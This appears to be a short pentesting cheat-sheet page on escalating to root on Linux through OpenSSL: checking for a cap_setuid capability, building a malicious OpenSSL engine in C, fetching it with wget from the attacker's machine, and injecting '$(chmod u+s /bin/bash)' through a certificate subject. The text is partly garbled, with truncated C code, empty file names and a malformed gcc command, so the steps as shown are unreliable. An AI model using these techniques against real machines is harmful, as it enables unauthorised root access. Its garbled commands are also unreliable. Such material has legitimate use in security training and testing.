OpenSSL Privilege Escalation

Last modified: 2023-03-09

Privilege Escalation

Privilege Escalation (SUID)


1. Get Capabilities

Chack capabilities in the target machine.

# -r: recursive
getcap -r / 2>/dev/null

If you see the openssl has the capability set as below, you can successfully exploit it.

/usr/bin/openssl = cap_setuid+ep

2. Create the Exploit in C

In local machine, you need to have “libssl-dev” to use the header file named “openssl/engine.h” in the exploit.
If you don't have it yet, install it.

sudo apt install libssl-dev

Then create "exploit.c".

#include <openssl/engine.h>

static int bind(ENGINE *e, const char *id) {
    setuid(0); setgid(0);


Now compile it using gcc.

# -fPIC: for generating a shared object (PIC: Position Independent Code)
# -c: compile and assemble, but do not link.
gcc -fPIC -o exploit.o -c exploit.c
# -shared: create a shared library.
gcc -shared -o -lcrypto exploit.o

3. Get the Root Shell

Transfer the "" to the target machine.

wget http://<local-ip>:8000/

Run the exploit and finally you should get the root shell.

# req: PKCS#10 X.509 Certificate Signing Request (CSR) Management.
# engine: Engine (loadable module) information and manipulation.
openssl req -engine ./

Command Injection in Subject

openssl x509 -in /opt/example.crt -noout -subject

If the above command is executed by root and use values of subjects in any way, we might be able to execute arbitrary command as root.


For example, create a certificate that contains the malicious subject value.
When the prompt asks us to enter values, we can insert arbitrary command.

openssl req -x509 -sha256 -nodes -newkey rsa:4096 -keyout /opt/example.key -out /opt/example.crt -days 1

Common Name (e.g. server FQDN or YOUR name) []:$(chmod u+s /bin/bash)

Then some shell script, that uses the subject values, is executed as root, our command ($(chmod u+s /bin/bash)) may be executed as root.